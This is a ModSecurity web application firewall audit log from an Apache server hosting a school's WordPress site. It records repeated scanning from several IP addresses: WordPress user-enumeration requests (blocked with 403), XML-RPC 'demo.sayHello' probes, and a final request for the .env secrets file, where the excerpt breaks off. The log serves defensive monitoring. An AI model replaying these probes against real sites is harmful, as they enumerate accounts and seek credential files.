--cf06c65b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf06c65b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446418768030 2780 (- - -) Stopwatch2: 1747446418768030 2780; combined=1242, p1=437, p2=776, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf06c65b-Z-- --2f0c5118-A-- [17/May/2025:08:47:03 +0700] aCfql3yxdQCiyU1ENFcn7QAAAAQ 103.236.140.4 44458 103.236.140.4 8181 --2f0c5118-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2f0c5118-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f0c5118-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446423385258 2388 (- - -) Stopwatch2: 1747446423385258 2388; combined=1083, p1=381, p2=675, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f0c5118-Z-- --7286a470-A-- [17/May/2025:08:47:03 +0700] aCfqlxKi5m5upc8uMd6iRAAAANI 103.236.140.4 44460 103.236.140.4 8181 --7286a470-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.236 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7286a470-C-- demo.sayHello --7286a470-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7286a470-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446423946174 5661 (- - -) Stopwatch2: 1747446423946174 5661; combined=4280, p1=510, p2=3451, p3=124, p4=36, p5=94, sr=75, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7286a470-Z-- --3f0b1a19-A-- [17/May/2025:08:47:13 +0700] aCfqoQTOsBn9MSWb6WJuzQAAAI8 103.236.140.4 44466 103.236.140.4 8181 --3f0b1a19-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.38 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f0b1a19-C-- demo.sayHello --3f0b1a19-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f0b1a19-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446433212111 5099 (- - -) Stopwatch2: 1747446433212111 5099; combined=3868, p1=477, p2=3183, p3=22, p4=27, p5=93, sr=68, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f0b1a19-Z-- --557b995a-A-- [17/May/2025:08:47:51 +0700] aCfqxwTOsBn9MSWb6WJuzwAAAJM 103.236.140.4 44470 103.236.140.4 8181 --557b995a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --557b995a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --557b995a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446471567173 3400 (- - -) Stopwatch2: 1747446471567173 3400; combined=1478, p1=488, p2=956, p3=0, p4=0, p5=33, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --557b995a-Z-- --f9852d7d-A-- [17/May/2025:08:47:57 +0700] aCfqzQTOsBn9MSWb6WJu0QAAAJY 103.236.140.4 44474 103.236.140.4 8181 --f9852d7d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.232 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f9852d7d-C-- demo.sayHello --f9852d7d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9852d7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446477397822 5264 (- - -) Stopwatch2: 1747446477397822 5264; combined=3577, p1=488, p2=2907, p3=32, p4=34, p5=70, sr=58, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9852d7d-Z-- --bb065f6f-A-- [17/May/2025:08:48:59 +0700] aCfrCwTOsBn9MSWb6WJu0wAAAJg 103.236.140.4 44482 103.236.140.4 8181 --bb065f6f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.81 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bb065f6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb065f6f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446539500855 2396 (- - -) Stopwatch2: 1747446539500855 2396; combined=1118, p1=361, p2=725, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb065f6f-Z-- --f0eb0e0e-A-- [17/May/2025:08:49:05 +0700] aCfrEQTOsBn9MSWb6WJu1QAAAIM 103.236.140.4 44486 103.236.140.4 8181 --f0eb0e0e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.81 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f0eb0e0e-C-- demo.sayHello --f0eb0e0e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0eb0e0e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446545795732 5711 (- - -) Stopwatch2: 1747446545795732 5711; combined=4172, p1=549, p2=3399, p3=32, p4=36, p5=93, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0eb0e0e-Z-- --e9d03160-A-- [17/May/2025:08:49:18 +0700] aCfrHgTOsBn9MSWb6WJu1wAAAIY 103.236.140.4 44492 103.236.140.4 8181 --e9d03160-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e9d03160-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9d03160-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446558570601 3253 (- - -) Stopwatch2: 1747446558570601 3253; combined=1428, p1=490, p2=905, p3=0, p4=0, p5=32, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9d03160-Z-- --e80fc90b-A-- [17/May/2025:08:49:24 +0700] aCfrJOm4kjNN-hEbWjJBVQAAAEc 103.236.140.4 44496 103.236.140.4 8181 --e80fc90b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e80fc90b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e80fc90b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446564665232 2816 (- - -) Stopwatch2: 1747446564665232 2816; combined=1241, p1=428, p2=783, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e80fc90b-Z-- --ff552009-A-- [17/May/2025:08:49:24 +0700] aCfrJATOsBn9MSWb6WJu2QAAAIc 103.236.140.4 44498 103.236.140.4 8181 --ff552009-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.138 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ff552009-C-- demo.sayHello --ff552009-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff552009-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446564969444 4965 (- - -) Stopwatch2: 1747446564969444 4965; combined=3911, p1=435, p2=3259, p3=32, p4=36, p5=88, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff552009-Z-- --d3191f7f-A-- [17/May/2025:08:49:30 +0700] aCfrKgTOsBn9MSWb6WJu2wAAAIk 103.236.140.4 44504 103.236.140.4 8181 --d3191f7f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.187 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d3191f7f-C-- demo.sayHello --d3191f7f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3191f7f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446570694249 6698 (- - -) Stopwatch2: 1747446570694249 6698; combined=4779, p1=608, p2=3988, p3=33, p4=34, p5=69, sr=81, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3191f7f-Z-- --4d3bb306-A-- [17/May/2025:08:50:22 +0700] aCfrXgTOsBn9MSWb6WJu3QAAAIo 103.236.140.4 44510 103.236.140.4 8181 --4d3bb306-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4d3bb306-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d3bb306-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446622438853 3231 (- - -) Stopwatch2: 1747446622438853 3231; combined=1428, p1=501, p2=895, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d3bb306-Z-- --e3808525-A-- [17/May/2025:08:50:28 +0700] aCfrZATOsBn9MSWb6WJu3wAAAJA 103.236.140.4 44514 103.236.140.4 8181 --e3808525-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.250 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e3808525-C-- demo.sayHello --e3808525-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3808525-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446628260143 2820 (- - -) Stopwatch2: 1747446628260143 2820; combined=2165, p1=278, p2=1765, p3=14, p4=14, p5=55, sr=52, sw=39, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3808525-Z-- --8b2d765a-A-- [17/May/2025:08:50:45 +0700] aCfrdQTOsBn9MSWb6WJu4AAAAI8 103.236.140.4 44518 103.236.140.4 8181 --8b2d765a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8b2d765a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b2d765a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446645481173 3030 (- - -) Stopwatch2: 1747446645481173 3030; combined=1296, p1=437, p2=824, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b2d765a-Z-- --b7163877-A-- [17/May/2025:08:50:53 +0700] aCfrfRKi5m5upc8uMd6iRQAAANM 103.236.140.4 44522 103.236.140.4 8181 --b7163877-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.142 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b7163877-C-- demo.sayHello --b7163877-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7163877-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446653204382 4697 (- - -) Stopwatch2: 1747446653204382 4697; combined=3619, p1=444, p2=2977, p3=23, p4=25, p5=88, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7163877-Z-- --e0700a73-A-- [17/May/2025:08:52:19 +0700] aCfr03yxdQCiyU1ENFcn7wAAAAY 103.236.140.4 44536 103.236.140.4 8181 --e0700a73-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.183 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e0700a73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0700a73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446739511297 3348 (- - -) Stopwatch2: 1747446739511297 3348; combined=1462, p1=473, p2=956, p3=0, p4=0, p5=32, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0700a73-Z-- --70977b50-A-- [17/May/2025:08:52:26 +0700] aCfr2gTOsBn9MSWb6WJu5gAAAIM 103.236.140.4 44540 103.236.140.4 8181 --70977b50-B-- GET /.env HTTP/1.0 Referer: https://google.com Host: 103.236.140.4 X-Real-IP: 37.187.139.239 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 